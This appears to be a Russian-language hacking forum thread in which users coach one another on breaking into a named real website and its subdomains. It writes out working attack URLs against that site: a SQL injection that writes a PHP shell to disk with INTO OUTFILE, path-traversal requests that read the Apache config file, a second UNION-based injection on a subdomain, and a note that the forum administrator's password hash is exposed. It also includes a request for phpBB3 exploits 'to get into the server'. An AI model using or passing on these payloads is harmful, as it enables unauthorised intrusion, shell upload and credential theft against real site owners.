я это находил. эти нечего не дают пассы. надо шелл залить

попробуй INTO OUTFILE и ищи папку с правами на запись

подскадите как составить запрос на запись файла.

например:
http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+

мб пригодится
http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf

Fuckel

Я вот одного не пойму, зачем советовать то, что не будет работать?
Для записи в файл нужны права, а там их нет у юзера

Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме

я посоветовал ему попробывать, не утверждал что будет работать

спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
какиенибудь ссылки. Уж очень хочиться проникнуть в серв.

https://forum.antichat.ru/thread24488.html

2 Скорпиончик

http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00

Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru

смотрим online.egechita.ru и видим

http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--

SQL injection

Хеш админа форума доступен